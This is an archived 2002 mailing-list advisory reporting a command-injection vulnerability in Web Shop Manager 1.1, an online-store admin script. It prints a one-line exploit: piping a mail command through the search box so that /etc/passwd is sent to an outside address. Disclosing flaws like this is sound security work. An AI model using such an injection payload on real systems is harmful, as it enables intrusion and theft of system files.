Summary The Web Shop Manager(http://www.webscriptworld.com/scripts/wsm.phtml) allows you to manage a fully functional online store from a centralized web-based administration system. A security vulnerability in the product allows executing of arbitrary commands with the privileges of the script file used by the product. Details Vulnerable systems: * Web Shop Manager version 1.1 Exploit: It is possible to send server's password file any mail address by writing the following command in Web Shop Manager's search box: |mail userat_private < /etc/passwd __________________________________________________ Do You Yahoo!? HotJobs - Search Thousands of New Jobs http://www.hotjobs.com
This archive was generated by hypermail 2b30 : Thu Aug 15 2002 - 10:54:36 PDT